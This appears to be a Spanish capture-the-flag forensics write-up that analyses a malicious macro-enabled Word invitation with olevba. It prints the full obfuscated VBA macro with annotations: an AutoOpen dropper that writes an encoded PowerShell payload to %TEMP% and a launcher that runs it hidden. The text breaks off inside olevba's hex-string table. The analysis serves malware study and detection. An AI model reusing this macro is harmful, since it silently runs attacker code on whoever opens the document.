Halloween Invitation
Se nos proporciona un archivo ZIP que contiene un fichero llamado invitation.docm. La extensión `.docm` ya indica un documento de Word con macros habilitadas, así que conviene tratarlo como una muestra potencialmente maliciosa y analizarlo en un entorno aislado, sin abrirlo en Word:
$ unzip -l forensics_halloween_invitation.zip
Archive: forensics_halloween_invitation.zip
Length Date Time Name
--------- ---------- ----- ----
5252634 10-12-2022 08:04 invitation.docm
--------- -------
5252634 1 file
$ unzip forensics_halloween_invitation.zip
Archive: forensics_halloween_invitation.zip
inflating: invitation.docm
$ file invitation.docm
invitation.docm: Microsoft Word 2007+
Extracción de macros VBA
Esto significa que tenemos un documento de Microsoft Word con macros VBA. En lugar de abrirlo en Microsoft Word, podemos usar olevba (de oletools) para extraer el código VBA. Dos notas sobre la salida: la advertencia «VBA stomping cannot be detected» recuerda que olevba muestra el código fuente almacenado en el stream, que en una muestra real podría no coincidir con el p-code compilado que Word ejecuta; y las opciones `--deobf` / `--decode` que olevba sugiere en su tabla pueden ahorrar parte de la decodificación manual de las cadenas hexadecimales:
$ olevba invitation.docm
olevba 0.60.1 on Python 3.10.8 - http://decalage.info/python/oletools
===============================================================================
FILE: invitation.docm
Type: OpenXML
WARNING For now, VBA stomping cannot be detected for files in memory
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' Auto-exec entry point: runs as soon as the document is opened with macros
' enabled (olevba reports it under "AutoExec"). Two stages, in order:
'   1. odhsjwpphlxnb - decode the embedded payload and drop it to %TEMP%\history.bak
'   2. lmavedb       - read the dropped file back and launch it via PowerShell
' Note: the "Call" keyword that olevba flags as a possible XLM/DLL call is just
' this plain Sub call; there is no Excel 4 macro involved.
Sub AutoOpen()
odhsjwpphlxnb
Call lmavedb
End Sub
' Stage 1 (dropper): decodes the embedded payload and writes it to %TEMP%\history.bak.
' All sensitive strings are hex-encoded and decoded at runtime by uxdufnkjlialsyp
' (the decoded values also appear in olevba's "Hex String" table further down):
'   "53637269707469" & "6e672e46696c6553797374656d4f626a656374" -> "Scripting.FileSystemObject"
'   "5c68697374" & "6f72792e62616b"                              -> "\history.bak"
' dropPath and the two object variables are never declared (no Option Explicit in
' the extracted module), so they are implicit Variants.
Private Sub odhsjwpphlxnb()
Dim bnhupraoau As String
' Points a WScript.Shell at %TEMP%; the object is not kept and nothing in the
' visible code depends on this working directory afterwards.
CreateObject("WScript.Shell").currentdirectory = Environ("TEMP")
' Fully decoded payload text (sryivxjsdncj -> okbzichkqtto).
bnhupraoau = sryivxjsdncj()
dropPath = Environ("TEMP")
Set rxnnvnfqufrzqfhnff = CreateObject(uxdufnkjlialsyp("53637269707469") & uxdufnkjlialsyp("6e672e46696c6553797374656d4f626a656374"))
' Creates %TEMP%\history.bak (the True argument is FSO's overwrite flag) and writes
' the payload into it; the benign-looking ".bak" name is presumably chosen to blend in.
' IOC for hunting: a .bak file written under %TEMP% by WINWORD.EXE.
Set dfdjqgaqhvxxi = rxnnvnfqufrzqfhnff.CreateTextFile(dropPath & uxdufnkjlialsyp("5c68697374") & uxdufnkjlialsyp("6f72792e62616b"), True)
dfdjqgaqhvxxi.Write bnhupraoau
dfdjqgaqhvxxi.Close
End Sub
' Second decoding layer: turns a string of space-separated decimal character
' codes into text, e.g. "74 65 66 122" -> "JABz" (Chr(74)="J", Chr(65)="A",
' Chr(66)="B", Chr(122)="z"). Its input is itself produced by the hex decoder
' uxdufnkjlialsyp (see okbzichkqtto).
' Param strBytes: whitespace-delimited decimal codes (Split with no delimiter
'                 argument splits on the space character).
' Returns: the concatenated characters.
Private Function wdysllqkgsbzs(strBytes) As String
Dim aNumbers
Dim fxnrfzsdxmcvranp As String
Dim iIter
fxnrfzsdxmcvranp = ""
aNumbers = Split(strBytes)
For iIter = LBound(aNumbers) To UBound(aNumbers)
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + Chr(aNumbers(iIter))
Next
wdysllqkgsbzs = fxnrfzsdxmcvranp
End Function
' Assembles the payload from ~55 fragments appended in order. Each fragment is
' double-encoded: hex literal -> (uxdufnkjlialsyp) -> space-separated decimal
' character codes -> (wdysllqkgsbzs) -> text. Most hex literals are split into
' two "&"-joined pieces; each piece is decoded on its own, so the split always
' falls on a hex-pair boundary but may fall in the middle of a decimal number
' (e.g. "...65 6" & "7 48..." -> "65 67 48"), which defeats naive string matching
' on single literals.
' The first fragment decodes to "JABzAD0A..." (see olevba's Hex String table),
' which looks like base64 of UTF-16LE text -- consistent with the
' "powershell -e" launch in lmavedb. To recover the script, reimplement the two
' decoders (e.g. in Python), join the fragments in this order, base64-decode
' and read the result as UTF-16LE -- TODO confirm against the actual output.
Private Function okbzichkqtto() As String
Dim fxnrfzsdxmcvranp As String
fxnrfzsdxmcvranp = ""
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3734203635203636203132322036352036382034382036352037342031") & uxdufnkjlialsyp("31392036352035312036352036382039392036352037362031303320363520353120363520363820383120363520373620313033"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520313230203635203638203130") & uxdufnkjlialsyp("37203635203739203635203635203131372036352036382038352036352037372031303320363520353420363520363820313033203635203737203635203635203532"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203638203635203635203734") & uxdufnkjlialsyp("20313139203635203535203635203637203831203635203937203831203635203537203635203637203939203635203930203635203635203438203635203638203737"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203839203130332036362031303620363520373120373720363520373820313033203636203130372036352036") & uxdufnkjlialsyp("37203438203635203737203635203635203438203635203638203737203635203930"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313033203635203132312036352036382038312036352037372036352036352035") & uxdufnkjlialsyp("33203635203637203438203635203738203131392036362031303820363520373120363920363520373720313033203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313232203635203731203639203635203737203130332036362031303620363520363720393920363520373920313139203635203130372036352037322036352036352038302038312036352031") & uxdufnkjlialsyp("3130203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373120313033203635203130302036352036362034382036352037322036352036352037392031303320") & uxdufnkjlialsyp("36352031313820363520363720353620363520373420313139203635203535203635203637203831"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352031303020313033203635203537203635203639203130372036352039382031303320363620353020363520373120353620363520393720313139203636203130382036352036372034") & uxdufnkjlialsyp("38203635203835"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("31303320363620313038203635203732203737203635203130302036352036362037382036352037312038352036352031303020363520363620313131203635203731203536203635203930") & uxdufnkjlialsyp("203635203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313033203635203637203438203635203836203831203636203132322036352037312038") & uxdufnkjlialsyp("35203635203831203130332036362031303420363520373220373720363520393720383120363620313036203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373020363520363520383920383120363620313231203635203732203737203635203937203831203636") & uxdufnkjlialsyp("2031313720363520373120393920363520373320363520363520313136203635203730203835203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3939203130332036362031313220363520363720363520363520373420363520363620313139203635203637203831203635203939203131392036352031313820") & uxdufnkjlialsyp("3635203731203831203635203738203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520313232203635203731203733203635") & uxdufnkjlialsyp("20383920313139203636203130362036352036382038392036352039302036352036352031303320363520363720343820363520383320363520363620313038"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352037312036392036352039302036352036362031303820363520373220373320363520393920313139203635") & uxdufnkjlialsyp("20313033203635203639203635203635203130312031313920363520313035203635203639"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363920363520313030203831203636203438203635203731203130332036352039") & uxdufnkjlialsyp("38203131392036362031323120363520373120313037203635203130312031303320363620313034203635203732203831"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520393720383120363620") & uxdufnkjlialsyp("313138203635203731203532203635203733203130332036352035372036352036372038312036352039372038312036362035372036352036382031313520363520313030"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313139203636203131312036352037312031303720363520393820363520363620313038") & uxdufnkjlialsyp("2036352036372036352036352037352036352036352031303720363520373220383120363520393920313033203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("34392036352037312038352036352037352038312036362035352036352036372038312036352038392031313920363520353720363520363720313033203635203833203831203636203131") & uxdufnkjlialsyp("37203635203732"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38392036352039382031313920363620313134203635203731203835203635203736203831203636203833") & uxdufnkjlialsyp("20363520373120383520363520393920313139203636203438203635203639203438203635203930"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38312036362034382036352037312031303320363520393820313139203636203130372036352036372036352036352037362038312036362038362036352037322037") & uxdufnkjlialsyp("37203635203930203831203636203637"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373120363920363520393920313139203636203131322036352037312037372036352038352036352036362031303420363520") & uxdufnkjlialsyp("37322037332036352039392031313920363620313132203635203731"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("35322036352039302031313920363520313033203635203637203438203635203836203831203636203132312036352037312031303720363520373320363520363520313037203635203732203635") & uxdufnkjlialsyp("203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37342036352036362031323220363520363720") & uxdufnkjlialsyp("35362036352037372036352036352034382036352036382037372036352039302031303320363520313231203635203638203831203635203737203635203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("353320363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635") & uxdufnkjlialsyp("2037312038352036352039392031303320363620313232203635203637"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352036352038312036352036362035352036352036372037332036352038") & uxdufnkjlialsyp("3120383120363620343920363520373220383120363520393720363520363620313138203635203732203733203635203937"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("383120363620353420363520373120363920363520") & uxdufnkjlialsyp("313030203635203636203131322036352037312035362036352039382031303320363520313035203635203638203438203635203734203635203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("31313220363520373220343820363520") & uxdufnkjlialsyp("37352038312036352035352036352037312031303720363520393020313033203635203130332036352036372031303320363520373420363520363620313036203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3637") & uxdufnkjlialsyp("20363520363520373620383120363620313137203635203731203835203635203733203635203635203131302036352036392035322036352039382031313920363620313137203635203731203835"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373420313139203635203131322036352036372036352036352031303120313139203635203130372036352037322037332036352038302038312036362031313220363520") & uxdufnkjlialsyp("373120383520363520313031"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352036352031303320") & uxdufnkjlialsyp("363520363720383120363520383920313139203635203130332036352036372034382036352038322038312036362031323120363520373220373320363520393820313139203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3132312036352036392036392036352038392031313920363620343820363520373120313037203635203938203131392036362031313720363520") & uxdufnkjlialsyp("363720363520363520383520313139203636203438203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3731203536203635203939203635203635203130332036352036372034382036352038322038312036362031323120") & uxdufnkjlialsyp("36352037322037332036352039382031313920363620313231203635203730203839"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520383920383120363620313231203635203731203130372036352038392038") & uxdufnkjlialsyp("31203636203130352036352037312031313920363520393020383120363520313033203635203731203835203635203739"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3131392036352031303720363520373220373320363520383020383120") & uxdufnkjlialsyp("3636203830203635203732203835203635203130302036352036352031313620363520373020373720363520313030203635203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3132312036352037") & uxdufnkjlialsyp("31203130372036352039382031303320363620313130203635203637203635203635203736203831203636203734203635203731203532203635203939203635203636203439203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37322038312036352038342031313920363620313035203635203731203131312036352039302038312036362031303620363520373220383120363520373320363520363520313037203635203732") & uxdufnkjlialsyp("203733"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203739203131392036352031303720363520373220383120363520383020383120363620") & uxdufnkjlialsyp("373420363520373120353220363520313030203130332036362031313820363520373120313135203635203930"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38312036352031313620363520373020373320363520393020383120363620313232203635203732203831203635203834203831203636203130") & uxdufnkjlialsyp("3820363520373220383120363520393720363520363620313138"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203731203831203635203733") & uxdufnkjlialsyp("20363520363520313136203635203730203835203635203939203130332036362031313220363520363720363520363520373420363520363620313139203635203637"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3831203635203939203131392036352031313820363520363820393920363520393020383120363620313034203635203638203733203635203737203131392036362031303420363520363820373320") & uxdufnkjlialsyp("3635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38392031313920363520313033203635203637203438203635203834203831203636203130382036352037322038312036352039372036352036362031313820363520373120") & uxdufnkjlialsyp("3831203635203733203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363620383120") & uxdufnkjlialsyp("36352036392035362036352038352031313920363620383520363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37312038352036352039392031303320363620313232203635203637203635203635203831203635203636203535") & uxdufnkjlialsyp("203635203637203733203635203831203831203636203439203635203732203831203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3937203635203636203131382036352037322037332036352039372038312036362035342036352037312036392036352031303020363520363620313132203635203731203536203635203938") & uxdufnkjlialsyp("20313033"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203130352036352036382034382036352037342036352036362031313220363520373220343820363520373320363520363520") & uxdufnkjlialsyp("3131362036352036392037332036352039382031313920363620313037"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373220") & uxdufnkjlialsyp("3130372036352037332036352036352031313120363520373020313135203635203835203131392036362035332036352037322037372036352031303020363520363620313038203635203731"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3438203635") & uxdufnkjlialsyp("203736203130332036362038352036352037312038352036352031303120363520363620343820363520363720353220363520383220383120363620313137203635203731203737203635203938"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3131392036362031303720363520373120313037203635203938203130332036362031313020363520373020343820363520373920313033203635203534203635203730203835203635") & uxdufnkjlialsyp("203836203635203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37312036352036382031303320363520373620313033203636203732203635203731") & uxdufnkjlialsyp("20383520363520313030203635203636203637203635203732203130372036352031303020363520363620313038203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3732203737203635203735203635203635203130372036352037312038352036352037352031313920363520313037203635203732203733203635203735203831203635") & uxdufnkjlialsyp("20313033203635203637203438"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352039372031303320363620") & uxdufnkjlialsyp("3131382036352037312031303720363520393820313033203635203130332036352036372039392036352037332036352036352031313020363520363720313037203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313032") & uxdufnkjlialsyp("20383120363520313033203635203732203737203635203938203635203636203130382036352037312038352036352039392036352036352031303320363520363820363520363520373620313033"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520353220363520373220343820363520383320363520363620") & uxdufnkjlialsyp("3835203635203639203733203635203130312031313920363520343920363520373220383520363520393920363520363520313232203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373220373320363520383820313139203635203132322036352036382038312036352037382038") & uxdufnkjlialsyp("31203636203533203635203730203536203635203938203831203635203438203635203731203737203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("393920313033203635203131392036352036382038352036352031303220383120") & uxdufnkjlialsyp("3635203631"))
okbzichkqtto = fxnrfzsdxmcvranp
End Function
' Pure indirection layer: returns okbzichkqtto() unchanged. It adds nothing
' functionally and exists only to put one more hop between AutoOpen and the
' payload builder.
' Returns: the decoded payload text.
Private Function sryivxjsdncj() As String
Dim fxnrfzsdxmcvranp As String
fxnrfzsdxmcvranp = ""
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + okbzichkqtto()
sryivxjsdncj = fxnrfzsdxmcvranp
End Function
' Stage 2 (launcher): reads %TEMP%\history.bak back from disk and runs its
' contents as an encoded PowerShell command. The hex literals are the same
' strings the dropper uses, just split at different points:
'   "536372697074696e672e46696c6553797374" & "656d4f626a656374" -> "Scripting.FileSystemObject"
'   "5c68" & "6973746f72792e62616b"                              -> "\history.bak"
' Like the dropper, this module declares none of its variables.
Sub lmavedb()
dropPath = Environ("TEMP")
Set rxnnvnfqufrzqfhnff = CreateObject(uxdufnkjlialsyp("536372697074696e672e46696c6553797374") & uxdufnkjlialsyp("656d4f626a656374"))
Set ktmlmpc = rxnnvnfqufrzqfhnff.OpenTextFile(dropPath & uxdufnkjlialsyp("5c68") & uxdufnkjlialsyp("6973746f72792e62616b"))
' secret = the whole dropped file, i.e. the payload assembled by okbzichkqtto.
secret = ktmlmpc.ReadAll
ktmlmpc.Close
' -e is -EncodedCommand (base64 of a UTF-16LE script) and -WindowStyle hidden
' keeps the console off-screen. The literal opens a double quote after -e that
' is never closed; the command line is passed to Shell as-is.
Code = "powershell -WindowStyle hidden -e """ & secret
' Shell() spawns powershell.exe as a child of WINWORD.EXE -- the process-tree
' pattern to hunt for (Word -> powershell -WindowStyle hidden -e <base64>).
' The 1 (vbNormalFocus) only affects the VBA-side window request; hiding is
' done by PowerShell's own switch. The return value x (the PID) is unused.
x = Shell(Code, 1)
End Sub
-------------------------------------------------------------------------------
VBA MACRO Module1.bas
in file: word/vbaProject.bin - OLE stream: 'VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' First decoding layer (Module1): converts a hex string into text two characters
' at a time, e.g. "53637269707469" -> "Scripti". Every obfuscated literal in
' ThisDocument goes through this function, sometimes twice (hex -> decimal code
' list -> text via wdysllqkgsbzs).
' Param tiyrahvbz: hex digits, two per output character; Val("&H..") parses each pair.
' Returns: the decoded text, accumulated directly in the function's return name.
Function uxdufnkjlialsyp(ByVal tiyrahvbz As String) As String
Dim nqjveawetp As Long
For nqjveawetp = 1 To Len(tiyrahvbz) Step 2
uxdufnkjlialsyp = uxdufnkjlialsyp & Chr$(Val("&H" & Mid$(tiyrahvbz, nqjveawetp, 2)))
Next nqjveawetp
End Function
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|AutoExec |AutoOpen |Runs when the Word document is opened |
|Suspicious|Environ |May read system environment variables |
|Suspicious|Write |May write to a file (if combined with Open) |
|Suspicious|CreateTextFile |May create a text file |
|Suspicious|Shell |May run an executable file or a system |
| | |command |
|Suspicious|WScript.Shell |May run an executable file or a system |
| | |command |
|Suspicious|powershell |May run PowerShell commands |
|Suspicious|Call |May call a DLL using Excel 4 Macros (XLM/XLF)|
|Suspicious|CreateObject |May create an OLE object |
|Suspicious|Chr |May attempt to obfuscate specific strings |
| | |(use option --deobf to deobfuscate) |
|Suspicious|Hex Strings |Hex-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
|Hex String|Scripti |53637269707469 |
|Hex String|ng.FileSystemObject |6e672e46696c6553797374656d4f626a656374 |
|Hex String|\hist |5c68697374 |
|Hex String|ory.bak |6f72792e62616b |
|Hex String|74 65 66 122 65 68 |373420363520363620313232203635203638203438203|
| |48 65 74 1 |6352037342031 |
|Hex String|19 65 51 65 68 99 65|313920363520353120363520363820393920363520373|
| |76 103 65 51 65 68 |620313033203635203531203635203638203831203635|
| |81 65 76 103 |20373620313033 |
|Hex String|65 120 65 68 10 |363520313230203635203638203130 |
|Hex String|7 65 79 65 65 117 65|372036352037392036352036352031313720363520363|
| |68 85 65 77 103 65 |820383520363520373720313033203635203534203635|
| |54 65 68 103 65 77 |20363820313033203635203737203635203635203532 |
| |65 65 52 | |
|Hex String|65 68 65 65 74 |3635203638203635203635203734 |
|Hex String| 119 65 55 65 67 81 |203131392036352035352036352036372038312036352|
| |65 97 81 65 57 65 67|039372038312036352035372036352036372039392036|
| |99 65 90 65 65 48 65|35203930203635203635203438203635203638203737 |
| |68 77 | |
|Hex String|65 89 103 66 106 65 |363520383920313033203636203130362036352037312|
| |71 77 65 78 103 66 |037372036352037382031303320363620313037203635|
| |107 65 6 |2036 |
|Hex String|7 48 65 77 65 65 48 |372034382036352037372036352036352034382036352|
| |65 68 77 65 90 |03638203737203635203930 |
|Hex String|103 65 121 65 68 81 |313033203635203132312036352036382038312036352|
| |65 77 65 65 5 |037372036352036352035 |
|Hex String|3 65 67 48 65 78 119|332036352036372034382036352037382031313920363|
| |66 108 65 71 69 65 |620313038203635203731203639203635203737203130|
| |77 103 65 |33203635 |
|Hex String|122 65 71 69 65 77 |313232203635203731203639203635203737203130332|
| |103 66 106 65 67 99 |036362031303620363520363720393920363520373920|
| |65 79 119 65 107 65 |313139203635203130372036352037322036352036352|
| |72 65 65 80 81 65 1 |038302038312036352031 |
|Hex String|10 65 |3130203635 |
|Hex String|71 103 65 100 65 66 |373120313033203635203130302036352036362034382|
| |48 65 72 65 65 79 |036352037322036352036352037392031303320 |
| |103 | |
|Hex String|65 118 65 67 56 65 |363520313138203635203637203536203635203734203|
| |74 119 65 55 65 67 |13139203635203535203635203637203831 |
| |81 | |
|Hex String|65 100 103 65 57 65 |363520313030203130332036352035372036352036392|
| |69 107 65 98 103 66 |031303720363520393820313033203636203530203635|
| |50 65 71 56 65 97 |203731203536203635203937203131392036362031303|
| |119 66 108 65 67 4 |82036352036372034 |
|Hex String|8 65 85 |38203635203835 |
|Hex String|103 66 108 65 72 77 |313033203636203130382036352037322037372036352|
| |65 100 65 66 78 65 |031303020363520363620373820363520373120383520|
| |71 85 65 100 65 66 |363520313030203635203636203131312036352037312|
| |111 65 71 56 65 90 |03536203635203930 |
|Hex String| 65 65 |203635203635 |
|Hex String|103 65 67 48 65 86 |313033203635203637203438203635203836203831203|
| |81 66 122 65 71 8 |636203132322036352037312038 |
|Hex String|5 65 81 103 66 104 |352036352038312031303320363620313034203635203|
| |65 72 77 65 97 81 66|732203737203635203937203831203636203130362036|
| |106 65 |35 |
|Hex String|70 65 65 89 81 66 |373020363520363520383920383120363620313231203|
| |121 65 72 77 65 97 |635203732203737203635203937203831203636 |
| |81 66 | |
|Hex String| 117 65 71 99 65 73 |203131372036352037312039392036352037332036352|
| |65 65 116 65 70 85 |0363520313136203635203730203835203635 |
| |65 | |
|Hex String|99 103 66 112 65 67 |393920313033203636203131322036352036372036352|
| |65 65 74 65 66 119 |036352037342036352036362031313920363520363720|
| |65 67 81 65 99 119 |3831203635203939203131392036352031313820 |
| |65 118 | |
|Hex String|65 71 81 65 78 65 |3635203731203831203635203738203635 |
|Hex String|65 122 65 71 73 65 |363520313232203635203731203733203635 |
|Hex String| 89 119 66 106 65 68|203839203131392036362031303620363520363820383|
| |89 65 90 65 65 103 |920363520393020363520363520313033203635203637|
| |65 67 48 65 83 65 66|20343820363520383320363520363620313038 |
| |108 | |
|Hex String|65 71 69 65 90 65 66|363520373120363920363520393020363520363620313|
| |108 65 72 73 65 99 |038203635203732203733203635203939203131392036|
| |119 65 |35 |
|Hex String| 103 65 69 65 65 101|203130332036352036392036352036352031303120313|
| |119 65 105 65 69 |13920363520313035203635203639 |
|Hex String|69 65 100 81 66 48 |363920363520313030203831203636203438203635203|
| |65 71 103 65 9 |731203130332036352039 |
|Hex String|8 119 66 121 65 71 |382031313920363620313231203635203731203130372|
| |107 65 101 103 66 |036352031303120313033203636203130342036352037|
| |104 65 72 81 |32203831 |
|Hex String|65 97 81 66 |363520393720383120363620 |
|Hex String|118 65 71 52 65 73 |313138203635203731203532203635203733203130332|
| |103 65 57 65 67 81 |036352035372036352036372038312036352039372038|
| |65 97 81 66 57 65 68|312036362035372036352036382031313520363520313|
| |115 65 100 |030 |
|Hex String|119 66 111 65 71 107|313139203636203131312036352037312031303720363|
| |65 98 65 66 108 |520393820363520363620313038 |
|Hex String| 65 67 65 65 75 65 |203635203637203635203635203735203635203635203|
| |65 107 65 72 81 65 |130372036352037322038312036352039392031303320|
| |99 103 66 |3636 |
|Hex String|49 65 71 85 65 75 81|343920363520373120383520363520373520383120363|
| |66 55 65 67 81 65 89|620353520363520363720383120363520383920313139|
| |119 65 57 65 67 103 |203635203537203635203637203130332036352038332|
| |65 83 81 66 11 |03831203636203131 |
|Hex String|7 65 72 |37203635203732 |
|Hex String|89 65 98 119 66 114 |383920363520393820313139203636203131342036352|
| |65 71 85 65 76 81 66|03731203835203635203736203831203636203833 |
| |83 | |
|Hex String| 65 71 85 65 99 119 |203635203731203835203635203939203131392036362|
| |66 48 65 69 48 65 90|03438203635203639203438203635203930 |
|Hex String|81 66 48 65 71 103 |383120363620343820363520373120313033203635203|
| |65 98 119 66 107 65 |938203131392036362031303720363520363720363520|
| |67 65 65 76 81 66 86|36352037362038312036362038362036352037322037 |
| |65 72 7 | |
|Hex String|7 65 90 81 66 67 |37203635203930203831203636203637 |
|Hex String|65 71 69 65 99 119 |363520373120363920363520393920313139203636203|
| |66 112 65 71 77 65 |131322036352037312037372036352038352036352036|
| |85 65 66 104 65 |362031303420363520 |
|Hex String|72 73 65 99 119 66 |373220373320363520393920313139203636203131322|
| |112 65 71 |03635203731 |
|Hex String|52 65 90 119 65 103 |353220363520393020313139203635203130332036352|
| |65 67 48 65 86 81 66|036372034382036352038362038312036362031323120|
| |121 65 71 107 65 73 |363520373120313037203635203733203635203635203|
| |65 65 107 65 72 65 |13037203635203732203635 |
|Hex String|74 65 66 122 65 67 |37342036352036362031323220363520363720 |
|Hex String|56 65 77 65 65 48 65|353620363520373720363520363520343820363520363|
| |68 77 65 90 103 65 |820373720363520393020313033203635203132312036|
| |121 65 68 81 65 77 |35203638203831203635203737203635203635 |
| |65 65 | |
|Hex String|53 65 67 65 65 76 81|353320363520363720363520363520373620383120363|
| |66 73 65 71 85 65 89|620373320363520373120383520363520383920383120|
| |81 66 107 65 |363620313037203635 |
|Hex String| 71 85 65 99 103 66 |203731203835203635203939203130332036362031323|
| |122 65 67 |2203635203637 |
|Hex String|65 65 81 65 66 55 65|363520363520383120363520363620353520363520363|
| |67 73 65 8 |72037332036352038 |
|Hex String|1 81 66 49 65 72 81 |312038312036362034392036352037322038312036352|
| |65 97 65 66 118 65 |039372036352036362031313820363520373220373320|
| |72 73 65 97 |3635203937 |
|Hex String|81 66 54 65 71 69 65|383120363620353420363520373120363920363520 |
|Hex String|100 65 66 112 65 71 |313030203635203636203131322036352037312035362|
